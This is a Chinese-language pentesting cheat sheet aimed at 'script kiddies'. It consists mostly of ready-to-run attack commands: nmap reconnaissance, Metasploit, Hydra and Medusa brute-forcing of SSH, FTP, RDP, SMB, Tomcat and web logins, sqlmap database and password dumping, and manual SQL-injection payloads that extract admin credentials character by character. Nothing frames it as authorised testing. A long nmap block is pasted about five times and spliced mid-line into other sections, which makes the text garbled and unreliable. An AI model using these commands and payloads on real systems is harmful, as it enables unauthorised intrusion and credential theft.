渗透测试基础总结(脚本小子)
(在文檔中做的時(shí)候都有圖片,需要圖片學(xué)習(xí)可D)
一、端口掃描工具
Nmap
1) 獲取遠(yuǎn)程主機(jī)的系統(tǒng)類型及開(kāi)放端口
nmap -sS -P0 -sV -O <target>
這里的 < target > 可以是單一 IP, 或主機(jī)名,或域名,或子網(wǎng)
-sS TCP SYN 掃描 (又稱半開(kāi)放,或隱身掃描)
-P0 允許你關(guān)閉 ICMP pings.
-sV 打開(kāi)系統(tǒng)版本檢測(cè)
-O 嘗試識(shí)別遠(yuǎn)程操作系統(tǒng)
其它選項(xiàng):
-A 同時(shí)打開(kāi)操作系統(tǒng)指紋和版本檢測(cè)
-v 詳細(xì)輸出掃描情況.
nmap -sS -P0 -A -v < target >
2) 列出開(kāi)放了指定端口的主機(jī)列表
nmap -sT -p 80 -oG – 192.168.1.* | grep open
3) 在網(wǎng)絡(luò)尋找所有在線主機(jī)
nmap -sP 192.168.0.*
或者也可用以下命令:
nmap -sP 192.168.0.0/24
指定 subnet
4) Ping 指定范圍內(nèi)的 IP 地址
nmap -sP 192.168.1.100-254
5) 在某段子網(wǎng)上查找未占用的 IP
nmap -T4 -sP 192.168.2.0/24 && egrep "00:00:00:00:00:00" /proc/net/arp
6) 在局域網(wǎng)上掃找 Conficker 蠕蟲(chóng)病毒
nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args safe=1 192.168.0.1-254
7) 掃描網(wǎng)絡(luò)上的惡意接入點(diǎn) (rogue APs).
nmap -A -p1-85,113,443,8080-8100 -T4 --min-hostgroup 50 --max-rtt-timeout 2000 --initial-rtt-timeout 300 --max-retries 3 --host-timeout 20m --max-scan-delay 1000 -oA wapscan 10.0.0.0/8
8 ) 使用誘餌掃描方法來(lái)掃描主機(jī)端口
sudo nmap -sS 192.168.0.10 -D 192.168.0.2
9) 為一個(gè)子網(wǎng)列出反向 DNS 記錄
nmap -R -sL 209.85.229.99/27 | awk {if($3=="not")print"("$2") no PTR";else print$3" is "$2} | grep
10) 顯示網(wǎng)絡(luò)上共有多少臺(tái) Linux 及 Win 設(shè)備?
sudo nmap -F -O 192.168.0.1-255 | grep "Running: " > /tmp/os; echo "$(cat /tmp/os | grep Linux | wc -l) Linux device(s)"; echo "$(cat /tmp/os | grep Windows | wc -l) Window(s) device"
nmap -sP 192.168.1.0/24
僅列出指定網(wǎng)絡(luò)上的每臺(tái)主機(jī),不發(fā)送任何報(bào)文到目標(biāo)主機(jī):
nmap -sL 192.168.1.0/24
探測(cè)目標(biāo)主機(jī)開(kāi)放的端口,可以指定一個(gè)以逗號(hào)分隔的端口列表(如-PS22,23,25,80):
nmap -PS 192.168.1.234
使用UDP ping探測(cè)主機(jī):
nmap -PU 192.168.1.0/24
使用頻率最高的掃描選項(xiàng):SYN掃描,又稱為半開(kāi)放掃描,它不打開(kāi)一個(gè)完全的TCP連接,執(zhí)行得很快:
nmap -sS 192.168.1.0/24
當(dāng)SYN掃描不能用時(shí),TCP Connect()掃描就是默認(rèn)的TCP掃描:
nmap -sT 192.168.1.0/24
UDP掃描用-sU選項(xiàng),UDP掃描發(fā)送空的(沒(méi)有數(shù)據(jù))UDP報(bào)頭到每個(gè)目標(biāo)端口:
nmap -sU 192.168.1.0/24
確定目標(biāo)機(jī)支持哪些IP協(xié)議 (TCP,ICMP,IGMP等):
nmap -sO 192.168.1.19
探測(cè)目標(biāo)主機(jī)的操作系統(tǒng):
nmap -O 192.168.1.19
nmap -A 192.168.1.19
另外,nmap官方文檔中的例子:
nmap -v scanme.
這個(gè)選項(xiàng)掃描主機(jī)scanme中 所有的保留TCP端口。選項(xiàng)-v啟用細(xì)節(jié)模式。
nmap -sS -O scanme./24
進(jìn)行秘密SYN掃描,對(duì)象為主機(jī)Saznme所在的“C類”網(wǎng)段的255臺(tái)主機(jī)。同時(shí)嘗試確定每臺(tái)工作主機(jī)的操作系統(tǒng)類型。因?yàn)檫M(jìn)行SYN掃描和操作系統(tǒng)檢測(cè),這個(gè)掃描需要有根權(quán)限。
nmap -sV -p 22,53,110,143,4564 198.116.0-255.1-127
進(jìn)行主機(jī)列舉和TCP掃描,對(duì)象為B類188.116網(wǎng)段中255個(gè)8位子網(wǎng)。這個(gè)測(cè)試用于確定系統(tǒng)是否運(yùn)行了sshd、DNS、imapd或4564端口。如果這些端口打開(kāi),將使用版本檢測(cè)來(lái)確定哪種應(yīng)用在運(yùn)行。
nmap -v -iR 100000 -P0 -p 80
隨機(jī)選擇100000臺(tái)主機(jī)掃描是否運(yùn)行Web服務(wù)器(80端口)。由起始階段發(fā)送探測(cè)報(bào)文來(lái)確定主機(jī)是否工作非常浪費(fèi)時(shí)間,而且只需探測(cè)主機(jī)的一個(gè)端口,因 此使用-P0禁止對(duì)主機(jī)列表。
nmap -P0 -p80 -oX logs/pb-port80scan.xml -oG logs/pb-port80scan.gnmap 216.163.128.20/20
掃描4096個(gè)IP地址,查找Web服務(wù)器(不ping),將結(jié)果以Grep和XML格式保存。
host -l | cut -d -f 4 | nmap -v -iL -
進(jìn)行DNS區(qū)域傳輸,以發(fā)現(xiàn)中的主機(jī),然后將IP地址提供給 Nmap。上述命令用于GNU/Linux -- 其它系統(tǒng)進(jìn)行區(qū)域傳輸時(shí)有不同的命令。
其他選項(xiàng):
-p (只掃描指定的端口)
單個(gè)端口和用連字符表示的端口范 圍(如 1-1023)都可以。當(dāng)既掃描TCP端口又掃描UDP端口時(shí),可以通過(guò)在端口號(hào)前加上T: 或者U:指定協(xié)議。 協(xié)議限定符一直有效直到指定另一個(gè)。 例如,參數(shù) -p U:53,111,137,T:21-25,80,139,8080 將掃描UDP 端口53,111,和137,同時(shí)掃描列出的TCP端口。
-F (快速 (有限的端口) 掃描)nmap -sP 192.168.1.0/24
僅列出指定網(wǎng)絡(luò)上的每臺(tái)主機(jī),不發(fā)送任何報(bào)文到目標(biāo)主機(jī):
nmap -sL 192.168.1.0/24
探測(cè)目標(biāo)主機(jī)開(kāi)放的端口,可以指定一個(gè)以逗號(hào)分隔的端口列表(如-PS22,23,25,80):
nmap -PS 192.168.1.234
使用UDP ping探測(cè)主機(jī):
nmap -PU 192.168.1.0/24
使用頻率最高的掃描選項(xiàng):SYN掃描,又稱為半開(kāi)放掃描,它不打開(kāi)一個(gè)完全的TCP連接,執(zhí)行得很快:
nmap -sS 192.168.1.0/24
當(dāng)SYN掃描不能用時(shí),TCP Connect()掃描就是默認(rèn)的TCP掃描:
nmap -sT 192.168.1.0/24
UDP掃描用-sU選項(xiàng),UDP掃描發(fā)送空的(沒(méi)有數(shù)據(jù))UDP報(bào)頭到每個(gè)目標(biāo)端口:
nmap -sU 192.168.1.0/24
確定目標(biāo)機(jī)支持哪些IP協(xié)議 (TCP,ICMP,IGMP等):
nmap -sO 192.168.1.19
探測(cè)目標(biāo)主機(jī)的操作系統(tǒng):
nmap -O 192.168.1.19
nmap -A 192.168.1.19
另外,nmap官方文檔中的例子:
nmap -v scanme.
這個(gè)選項(xiàng)掃描主機(jī)scanme中 所有的保留TCP端口。選項(xiàng)-v啟用細(xì)節(jié)模式。
nmap -sS -O scanme./24
進(jìn)行秘密SYN掃描,對(duì)象為主機(jī)Saznme所在的“C類”網(wǎng)段的255臺(tái)主機(jī)。同時(shí)嘗試確定每臺(tái)工作主機(jī)的操作系統(tǒng)類型。因?yàn)檫M(jìn)行SYN掃描和操作系統(tǒng)檢測(cè),這個(gè)掃描需要有根權(quán)限。
nmap -sV -p 22,53,110,143,4564 198.116.0-255.1-127
進(jìn)行主機(jī)列舉和TCP掃描,對(duì)象為B類188.116網(wǎng)段中255個(gè)8位子網(wǎng)。這個(gè)測(cè)試用于確定系統(tǒng)是否運(yùn)行了sshd、DNS、imapd或4564端口。如果這些端口打開(kāi),將使用版本檢測(cè)來(lái)確定哪種應(yīng)用在運(yùn)行。
nmap -v -iR 100000 -P0 -p 80
隨機(jī)選擇100000臺(tái)主機(jī)掃描是否運(yùn)行Web服務(wù)器(80端口)。由起始階段發(fā)送探測(cè)報(bào)文來(lái)確定主機(jī)是否工作非常浪費(fèi)時(shí)間,而且只需探測(cè)主機(jī)的一個(gè)端口,因 此使用-P0禁止對(duì)主機(jī)列表。
nmap -P0 -p80 -oX logs/pb-port80scan.xml -oG logs/pb-port80scan.gnmap 216.163.128.20/20
掃描4096個(gè)IP地址,查找Web服務(wù)器(不ping),將結(jié)果以Grep和XML格式保存。
host -l | cut -d -f 4 | nmap -v -iL -
進(jìn)行DNS區(qū)域傳輸,以發(fā)現(xiàn)中的主機(jī),然后將IP地址提供給 Nmap。上述命令用于GNU/Linux -- 其它系統(tǒng)進(jìn)行區(qū)域傳輸時(shí)有不同的命令。
其他選項(xiàng):
-p (只掃描指定的端口)
單個(gè)端口和用連字符表示的端口范 圍(如 1-1023)都可以。當(dāng)既掃描TCP端口又掃描UDP端口時(shí),可以通過(guò)在端口號(hào)前加上T: 或者U:指定協(xié)議。 協(xié)議限定符一直有效直到指定另一個(gè)。 例如,參數(shù) -p U:53,111,137,T:21-25,80,139,8080 將掃描UDP 端口53,111,和137,同時(shí)掃描列出的TCP端口。
-F (快速 (有限的端口) 掃描)nmap -sP 192.168.1.0/24
僅列出指定網(wǎng)絡(luò)上的每臺(tái)主機(jī),不發(fā)送任何報(bào)文到目標(biāo)主機(jī):
nmap -sL 192.168.1.0/24
探測(cè)目標(biāo)主機(jī)開(kāi)放的端口,可以指定一個(gè)以逗號(hào)分隔的端口列表(如-PS22,23,25,80):
nmap -PS 192.168.1.234
使用UDP ping探測(cè)主機(jī):
nmap -PU 192.168.1.0/24
使用頻率最高的掃描選項(xiàng):SYN掃描,又稱為半開(kāi)放掃描,它不打開(kāi)一個(gè)完全的TCP連接,執(zhí)行得很快:
nmap -sS 192.168.1.0/24
當(dāng)SYN掃描不能用時(shí),TCP Connect()掃描就是默認(rèn)的TCP掃描:
nmap -sT 192.168.1.0/24
UDP掃描用-sU選項(xiàng),UDP掃描發(fā)送空的(沒(méi)有數(shù)據(jù))UDP報(bào)頭到每個(gè)目標(biāo)端口:
nmap -sU 192.168.1.0/24
確定目標(biāo)機(jī)支持哪些IP協(xié)議 (TCP,ICMP,IGMP等):
nmap -sO 192.168.1.19
探測(cè)目標(biāo)主機(jī)的操作系統(tǒng):
nmap -O 192.168.1.19
nmap -A 192.168.1.19
另外,nmap官方文檔中的例子:
nmap -v scanme.
這個(gè)選項(xiàng)掃描主機(jī)scanme中 所有的保留TCP端口。選項(xiàng)-v啟用細(xì)節(jié)模式。
nmap -sS -O scanme./24
進(jìn)行秘密SYN掃描,對(duì)象為主機(jī)Saznme所在的“C類”網(wǎng)段的255臺(tái)主機(jī)。同時(shí)嘗試確定每臺(tái)工作主機(jī)的操作系統(tǒng)類型。因?yàn)檫M(jìn)行SYN掃描和操作系統(tǒng)檢測(cè),這個(gè)掃描需要有根權(quán)限。
nmap -sV -p 22,53,110,143,4564 198.116.0-255.1-127
進(jìn)行主機(jī)列舉和TCP掃描,對(duì)象為B類188.116網(wǎng)段中255個(gè)8位子網(wǎng)。這個(gè)測(cè)試用于確定系統(tǒng)是否運(yùn)行了sshd、DNS、imapd或4564端口。如果這些端口打開(kāi),將使用版本檢測(cè)來(lái)確定哪種應(yīng)用在運(yùn)行。
nmap -v -iR 100000 -P0 -p 80
隨機(jī)選擇100000臺(tái)主機(jī)掃描是否運(yùn)行Web服務(wù)器(80端口)。由起始階段發(fā)送探測(cè)報(bào)文來(lái)確定主機(jī)是否工作非常浪費(fèi)時(shí)間,而且只需探測(cè)主機(jī)的一個(gè)端口,因 此使用-P0禁止對(duì)主機(jī)列表。
nmap -P0 -p80 -oX logs/pb-port80scan.xml -oG logs/pb-port80scan.gnmap 216.163.128.20/20
掃描4096個(gè)IP地址,查找Web服務(wù)器(不ping),將結(jié)果以Grep和XML格式保存。
host -l | cut -d -f 4 | nmap -v -iL -
進(jìn)行DNS區(qū)域傳輸,以發(fā)現(xiàn)中的主機(jī),然后將IP地址提供給 Nmap。上述命令用于GNU/Linux -- 其它系統(tǒng)進(jìn)行區(qū)域傳輸時(shí)有不同的命令。
其他選項(xiàng):
-p (只掃描指定的端口)
單個(gè)端口和用連字符表示的端口范 圍(如 1-1023)都可以。當(dāng)既掃描TCP端口又掃描UDP端口時(shí),可以通過(guò)在端口號(hào)前加上T: 或者U:指定協(xié)議。 協(xié)議限定符一直有效直到指定另一個(gè)。 例如,參數(shù) -p U:53,111,137,T:21-25,80,139,8080 將掃描UDP 端口53,111,和137,同時(shí)掃描列出的TCP端口。
-F (快速 (有限的端口) 掃描)
二、中間人攻擊arp工具
Ettercap:登錄 - 推酷
Cain:技術(shù)成就夢(mèng)想51CTO-中國(guó)領(lǐng)先的IT技術(shù)網(wǎng)站
三、破解工具
1.Metasploit:MSF破解ssh
msf:(全稱)metasploit freamwork
使用命令:?? 破解ssh登錄名和密碼????????????????????????????????????????????????????????????
msconsole回車
search ssh? 查找ssh相關(guān)的模塊
use auxiliary/scanner/ssh/ssh_login? 調(diào)用ssh破解程序???????????????
show options??? 查看選項(xiàng)
set rhosts 127.0.0.1 設(shè)置要破解的IP地址(必須能ping通)
set rport 22??? 設(shè)置端口
set username root 設(shè)置用戶名
set pass_file /root/*.*? 設(shè)置密碼文件
set threads 50?? 設(shè)置線程50
run?? 開(kāi)始執(zhí)行
telnet同理,
kali自帶密碼字典路徑//usr/share/wordlists/w3af.txt
注:所有路徑必須是絕對(duì)路徑nmap -sP 192.168.1.0/24
僅列出指定網(wǎng)絡(luò)上的每臺(tái)主機(jī),不發(fā)送任何報(bào)文到目標(biāo)主機(jī):
nmap -sL 192.168.1.0/24
探測(cè)目標(biāo)主機(jī)開(kāi)放的端口,可以指定一個(gè)以逗號(hào)分隔的端口列表(如-PS22,23,25,80):
nmap -PS 192.168.1.234
使用UDP ping探測(cè)主機(jī):
nmap -PU 192.168.1.0/24
使用頻率最高的掃描選項(xiàng):SYN掃描,又稱為半開(kāi)放掃描,它不打開(kāi)一個(gè)完全的TCP連接,執(zhí)行得很快:
nmap -sS 192.168.1.0/24
當(dāng)SYN掃描不能用時(shí),TCP Connect()掃描就是默認(rèn)的TCP掃描:
nmap -sT 192.168.1.0/24
UDP掃描用-sU選項(xiàng),UDP掃描發(fā)送空的(沒(méi)有數(shù)據(jù))UDP報(bào)頭到每個(gè)目標(biāo)端口:
nmap -sU 192.168.1.0/24
確定目標(biāo)機(jī)支持哪些IP協(xié)議 (TCP,ICMP,IGMP等):
nmap -sO 192.168.1.19
探測(cè)目標(biāo)主機(jī)的操作系統(tǒng):
nmap -O 192.168.1.19
nmap -A 192.168.1.19
另外,nmap官方文檔中的例子:
nmap -v scanme.
這個(gè)選項(xiàng)掃描主機(jī)scanme中 所有的保留TCP端口。選項(xiàng)-v啟用細(xì)節(jié)模式。
nmap -sS -O scanme./24
進(jìn)行秘密SYN掃描,對(duì)象為主機(jī)Saznme所在的“C類”網(wǎng)段的255臺(tái)主機(jī)。同時(shí)嘗試確定每臺(tái)工作主機(jī)的操作系統(tǒng)類型。因?yàn)檫M(jìn)行SYN掃描和操作系統(tǒng)檢測(cè),這個(gè)掃描需要有根權(quán)限。
nmap -sV -p 22,53,110,143,4564 198.116.0-255.1-127
進(jìn)行主機(jī)列舉和TCP掃描,對(duì)象為B類188.116網(wǎng)段中255個(gè)8位子網(wǎng)。這個(gè)測(cè)試用于確定系統(tǒng)是否運(yùn)行了sshd、DNS、imapd或4564端口。如果這些端口打開(kāi),將使用版本檢測(cè)來(lái)確定哪種應(yīng)用在運(yùn)行。
nmap -v -iR 100000 -P0 -p 80
隨機(jī)選擇100000臺(tái)主機(jī)掃描是否運(yùn)行Web服務(wù)器(80端口)。由起始階段發(fā)送探測(cè)報(bào)文來(lái)確定主機(jī)是否工作非常浪費(fèi)時(shí)間,而且只需探測(cè)主機(jī)的一個(gè)端口,因 此使用-P0禁止對(duì)主機(jī)列表。
nmap -P0 -p80 -oX logs/pb-port80scan.xml -oG logs/pb-port80scan.gnmap 216.163.128.20/20
掃描4096個(gè)IP地址,查找Web服務(wù)器(不ping),將結(jié)果以Grep和XML格式保存。
host -l | cut -d -f 4 | nmap -v -iL -
進(jìn)行DNS區(qū)域傳輸,以發(fā)現(xiàn)中的主機(jī),然后將IP地址提供給 Nmap。上述命令用于GNU/Linux -- 其它系統(tǒng)進(jìn)行區(qū)域傳輸時(shí)有不同的命令。
其他選項(xiàng):
-p (只掃描指定的端口)
單個(gè)端口和用連字符表示的端口范 圍(如 1-1023)都可以。當(dāng)既掃描TCP端口又掃描UDP端口時(shí),可以通過(guò)在端口號(hào)前加上T: 或者U:指定協(xié)議。 協(xié)議限定符一直有效直到指定另一個(gè)。 例如,參數(shù) -p U:53,111,137,T:21-25,80,139,8080 將掃描UDP 端口53,111,和137,同時(shí)掃描列出的TCP端口。
-F (快速 (有限的端口) 掃描)nmap -sP 192.168.1.0/24
僅列出指定網(wǎng)絡(luò)上的每臺(tái)主機(jī),不發(fā)送任何報(bào)文到目標(biāo)主機(jī):
nmap -sL 192.168.1.0/24
探測(cè)目標(biāo)主機(jī)開(kāi)放的端口,可以指定一個(gè)以逗號(hào)分隔的端口列表(如-PS22,23,25,80):
nmap -PS 192.168.1.234
使用UDP ping探測(cè)主機(jī):
nmap -PU 192.168.1.0/24
使用頻率最高的掃描選項(xiàng):SYN掃描,又稱為半開(kāi)放掃描,它不打開(kāi)一個(gè)完全的TCP連接,執(zhí)行得很快:
nmap -sS 192.168.1.0/24
當(dāng)SYN掃描不能用時(shí),TCP Connect()掃描就是默認(rèn)的TCP掃描:
nmap -sT 192.168.1.0/24
UDP掃描用-sU選項(xiàng),UDP掃描發(fā)送空的(沒(méi)有數(shù)據(jù))UDP報(bào)頭到每個(gè)目標(biāo)端口:
nmap -sU 192.168.1.0/24
確定目標(biāo)機(jī)支持哪些IP協(xié)議 (TCP,ICMP,IGMP等):
nmap -sO 192.168.1.19
探測(cè)目標(biāo)主機(jī)的操作系統(tǒng):
nmap -O 192.168.1.19
nmap -A 192.168.1.19
另外,nmap官方文檔中的例子:
nmap -v scanme.
這個(gè)選項(xiàng)掃描主機(jī)scanme中 所有的保留TCP端口。選項(xiàng)-v啟用細(xì)節(jié)模式。
nmap -sS -O scanme./24
進(jìn)行秘密SYN掃描,對(duì)象為主機(jī)Saznme所在的“C類”網(wǎng)段的255臺(tái)主機(jī)。同時(shí)嘗試確定每臺(tái)工作主機(jī)的操作系統(tǒng)類型。因?yàn)檫M(jìn)行SYN掃描和操作系統(tǒng)檢測(cè),這個(gè)掃描需要有根權(quán)限。
nmap -sV -p 22,53,110,143,4564 198.116.0-255.1-127
進(jìn)行主機(jī)列舉和TCP掃描,對(duì)象為B類188.116網(wǎng)段中255個(gè)8位子網(wǎng)。這個(gè)測(cè)試用于確定系統(tǒng)是否運(yùn)行了sshd、DNS、imapd或4564端口。如果這些端口打開(kāi),將使用版本檢測(cè)來(lái)確定哪種應(yīng)用在運(yùn)行。
nmap -v -iR 100000 -P0 -p 80
隨機(jī)選擇100000臺(tái)主機(jī)掃描是否運(yùn)行Web服務(wù)器(80端口)。由起始階段發(fā)送探測(cè)報(bào)文來(lái)確定主機(jī)是否工作非常浪費(fèi)時(shí)間,而且只需探測(cè)主機(jī)的一個(gè)端口,因 此使用-P0禁止對(duì)主機(jī)列表。
nmap -P0 -p80 -oX logs/pb-port80scan.xml -oG logs/pb-port80scan.gnmap 216.163.128.20/20
掃描4096個(gè)IP地址,查找Web服務(wù)器(不ping),將結(jié)果以Grep和XML格式保存。
host -l | cut -d -f 4 | nmap -v -iL -
進(jìn)行DNS區(qū)域傳輸,以發(fā)現(xiàn)中的主機(jī),然后將IP地址提供給 Nmap。上述命令用于GNU/Linux -- 其它系統(tǒng)進(jìn)行區(qū)域傳輸時(shí)有不同的命令。
其他選項(xiàng):
-p (只掃描指定的端口)
單個(gè)端口和用連字符表示的端口范 圍(如 1-1023)都可以。當(dāng)既掃描TCP端口又掃描UDP端口時(shí),可以通過(guò)在端口號(hào)前加上T: 或者U:指定協(xié)議。 協(xié)議限定符一直有效直到指定另一個(gè)。 例如,參數(shù) -p U:53,111,137,T:21-25,80,139,8080 將掃描UDP 端口53,111,和137,同時(shí)掃描列出的TCP端口。
-F (快速 (有限的端口) 掃描)
MSF滲透掃描模塊:
http://qqhack8.blog.163.com/blog/static/114147985201473111827882??
2.Hydra破解
1、破解ssh:
hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip ssh
hydra -l 用戶名 -p 密碼字典 -t 線程 -o save.log -vV ip ssh
2、破解ftp:
hydra ip ftp -l 用戶名 -P 密碼字典 -t 線程(默認(rèn)16) -vV
hydra ip ftp -l 用戶名 -P 密碼字典 -e ns -vV
3、get方式提交,破解web登錄:
hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip http-get /admin/
hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns -f ip http-get /admin/index.PHP
4、post方式提交,破解web登錄:
hydra -l 用戶名 -P 密碼字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>"
(參數(shù)說(shuō)明:-t同時(shí)線程數(shù)3,-l用戶名是admin,字典pass.txt,保存為out.txt,-f 當(dāng)破解了一個(gè)密碼就停止, 10.36.16.18目標(biāo)ip,http-post-form表示破解是采用http的post方式提交的表單密碼破解,<title>中的內(nèi)容是表示錯(cuò)誤猜解的返回信息提示。)
5、破解https:
hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
6、破解teamspeak:
hydra -l 用戶名 -P 密碼字典 -s 端口號(hào) -vV ip teamspeak
7、破解cisco:
hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
8、破解smb:
hydra -l administrator -P pass.txt 10.36.16.18 smb
9、破解pop3:
hydra -l muts -P pass.txt my.pop3.mail pop3
10、破解rdp:
hydra ip rdp -l administrator -P pass.txt -V
11、破解http-proxy:
hydra -l admin -P pass.txt http-proxy://10.36.16.18
12、破解imap:
hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
參考網(wǎng)址:http://www.linuxde.net/2013/01/11487.html
3.Medusa暴力破解遠(yuǎn)程
?? kali?? linux自帶破解工具,使用的時(shí)候要獲得一些必要的信息。
?? 1、目標(biāo)IP地址
?? 2、登錄目標(biāo)的一個(gè)用戶名或者一個(gè)用戶名文件(都是猜測(cè)的用戶名也可以說(shuō)是用戶名字典)
?? 3、密碼字典
?? 4、要驗(yàn)證的服務(wù)名稱(比如ssh、http、telnet等)
使用命令:
?? ?medusa -h target_ip(攻擊ip) -u username -P path_to_passwordlist(密碼文件要打絕對(duì)路徑) -M ????? ?authentication_service_to_attack(要驗(yàn)證的服務(wù)名稱)
?? ?-u是要攻擊的目標(biāo)的id(用戶名)號(hào),如果改為大寫的U,將會(huì)是利用用戶名列表進(jìn)行攻擊,-M參數(shù)后面接的是你要攻擊的驗(yàn)證服務(wù)名稱。
參考網(wǎng)址:http://www.shangxueba.com/jingyan/1597226.html
4.payload破解
search tomcat查看tomcat的payload
payload就是加載模塊調(diào)用攻擊的有效加載項(xiàng)。(真心抽象)
msfconsole回車
use auxiliary/scanner/http/tomcat_mgr_login?? 調(diào)用tomcat破解程序
show options??? 查看選項(xiàng)
set rhosts 127.0.0.1 設(shè)置要破解的IP地址(必須能ping通)
set rport 8080??? 設(shè)置端口
set username root 設(shè)置用戶名(set user_file /*/*.*設(shè)置帳號(hào)字典)
set pass_file /root/*.*? 設(shè)置密碼字典
set threads 50?? 設(shè)置線程50
run?? 開(kāi)始執(zhí)行。
注:所有路徑必須是絕對(duì)路徑。
四.Sql注入工具
1.Sqlmap
sqlmap:數(shù)據(jù)庫(kù)注入工具。
可以用來(lái)猜測(cè)數(shù)據(jù)庫(kù)類型和利用漏洞滲透數(shù)據(jù)庫(kù)
注入點(diǎn)一般存在登錄頁(yè)面、查找頁(yè)面或添加頁(yè)面等用戶可以查找或修改數(shù)據(jù)的地方。
比如:最常用的尋找SQL注入點(diǎn)的方法,是在網(wǎng)站中尋找如下形式的頁(yè)面鏈接:http://www.xxx.com/xxx.asp?id=YY
?其中“YY”可能是數(shù)字,也有可能是字符串,分別被稱為整數(shù)類型數(shù)據(jù)或者字符型數(shù)據(jù)。
一般有一下幾種方法:
1、加? '? 法
瀏覽器可能會(huì)返回類似于下面的錯(cuò)誤提示信息:Microsoft JET Database Engine 錯(cuò)誤’80040e14表示有注入點(diǎn)。
2、and 1=1 和and 1=2 將and 1=1 寫在url最后面訪問(wèn)顯示正常,而and 1=2 提示錯(cuò)誤說(shuō)明有可能有注入點(diǎn)。如果兩種方式結(jié)果一樣,就表示沒(méi)戲。
3、sqlmap下輸入?? (-u "域名" --level 5 --dbs)? 猜測(cè)數(shù)據(jù)庫(kù)類型
Sqlmap參數(shù)使用
BT5里面的話前面就要加python
sqlmap.py -u url --dbs //爆數(shù)據(jù)庫(kù)
sqlmap.py -u url --current-db //爆當(dāng)前庫(kù)
sqlmap.py -u url --current-user //爆當(dāng)前用戶
sqlmap.py -u url --users?? 查看用戶權(quán)限
sqlmap.py -u url --tables -D 數(shù)據(jù)庫(kù) //爆表段
sqlmap.py -u url --columns -T 表段 -D 數(shù)據(jù)庫(kù) //爆字段
sqlmap.py -u url --dump -C 字段 -T 表段 -D 數(shù)據(jù)庫(kù) //猜解
sqlmap.py -u url --dump --start=1 --stop=3 -C 字段 -T 表段 -D 數(shù)據(jù)庫(kù) //猜解1到3的字段
加入python環(huán)境使用方法:
sqlmap.py -u url? 判斷
sqlmap.py -u url --is-dba -v? 這是判斷當(dāng)前數(shù)據(jù)庫(kù)的使用者是否是dba
sqlmap.py -u url --users -v 0? 這句的目的是列舉數(shù)據(jù)庫(kù)的用戶
sqlmap.py -u url --passwords -v 0這句的目的是獲取數(shù)據(jù)庫(kù)用戶的密碼
sqlmap.py -u url --privileges -v 0 這是判斷當(dāng)前的權(quán)限
sqlmap.py -u url --dbs -v 0 這句的目的是將所有的數(shù)據(jù)庫(kù)列出來(lái)
sqlmap.py -u url --tables -D '表' 爆表
sqlmap.py -u url --columns -T ‘表’-D ‘?dāng)?shù)據(jù)庫(kù)’爆列
sqlmap.py -u url --dump -T '表' --start 1 --stop 4 -v 0 這里是查詢第2到第4行的內(nèi)
sqlmap.py -u url --dump -all -v 0 爆數(shù)據(jù)庫(kù)
sqlmap.py -u url --users --password 爆用戶名密碼。
2.明小子Domain
明小子domian工具是針對(duì)Access、mssql數(shù)據(jù)庫(kù)的sql注入工具,另外此工具可用于掃描管理后臺(tái)、上傳、下載路徑,也可進(jìn)行簡(jiǎn)單的md5破解!(此工具功能性有限)
使用方法:
1、先打開(kāi)我們的明小子,在當(dāng)前路徑這里輸入你要注入的網(wǎng)站地址,然后連接如下圖。如果此網(wǎng)站有注入點(diǎn)的話,下面注入點(diǎn)框內(nèi)會(huì)出現(xiàn)紅色的注入點(diǎn)地址。
2、我們?nèi)我膺x中一個(gè)地址單擊鼠標(biāo)右鍵,點(diǎn)擊檢測(cè)注入。
3、然后點(diǎn)擊開(kāi)始檢測(cè)按鈕后。
最后我們得到網(wǎng)站的賬號(hào)密碼后 就可以去網(wǎng)站后臺(tái)去登錄了
3.Pangolin穿山甲
初始界面
輸入url地址進(jìn)行檢測(cè)
參考地址:http://www.hack80.com/thread-758-1-1.html
4.純手工sql注入
第一步先把IE菜單=>工具=>Internet選項(xiàng)=>高級(jí)=>顯示友好 HTTP 錯(cuò)誤信息前面的勾去掉。否則,不論服務(wù)器返回什么錯(cuò)誤,IE都只顯示為HTTP 500服務(wù)器錯(cuò)誤,不能獲得更多的提示信息。
數(shù)字型:and 1=1 and 1=2 判斷是否存在注入
字符型:' and '1'='1 ' and '1'='2
搜索型: 關(guān)鍵字%' and 1=1 and '%'='% 關(guān)鍵字%' and 1=2 and '%'='%
IIS報(bào)錯(cuò)情況下使用:
and user>0 (判斷是ACCESS還是MSSQL)
不報(bào)錯(cuò)則使用各自數(shù)據(jù)庫(kù)特性來(lái)判斷
and (select count(*) from msysobjects)>0 (返回權(quán)限不足access數(shù)據(jù)庫(kù))
and (select count(*) from sysobjects)>0 (返回正常則為MSSQL數(shù)據(jù)庫(kù))
and db_name()>0 (返回?cái)?shù)據(jù)庫(kù)名)
and 0<>(select @@version)-- (判斷版本信息)
and db_name()>0 (返回?cái)?shù)據(jù)庫(kù)名)
************注意:猜解之前先要找到后臺(tái)地址,不然白忙了**********
ACCESS注入:
猜解表名(正常則存在admin,不正常則不存在)
and exists (select * from [admin])
and (Select Count(*) from Admin)>0
猜解字段:(字段username存在則正常,不正常則不存在)
and (Select username from Admin)>0
and exists (select username from [admin])
猜解用戶名和密碼長(zhǎng)度
and (select top 1 len(username) from Admin)>0
and (select top 1 len(password) from Admin)>0
原 理:如果top 1的username長(zhǎng)度大于0,則條件成立;接著就是>1、>2、>3這樣測(cè)試下去,一直到條件不成立為止,比如>4成立,>5不成立,就是len(username)=5,即用戶名長(zhǎng)度為5.得到username的長(zhǎng)度后,用mid(username,N,1)截取第N位字符,再asc(mid(username,N,1))得到ASCII碼.
猜解用戶
and (select top 1 asc(mid(username,1,1)) from Admin)>0,1,2…,
當(dāng)輸入到109時(shí),顯示錯(cuò)誤,而108之前顯示正確,說(shuō)明第一個(gè)字符的ASCII碼為109.,得到第一個(gè)字符是m。
同理and (select top 1 asc(mid(username,2,1) from Admin)>0,1,2…
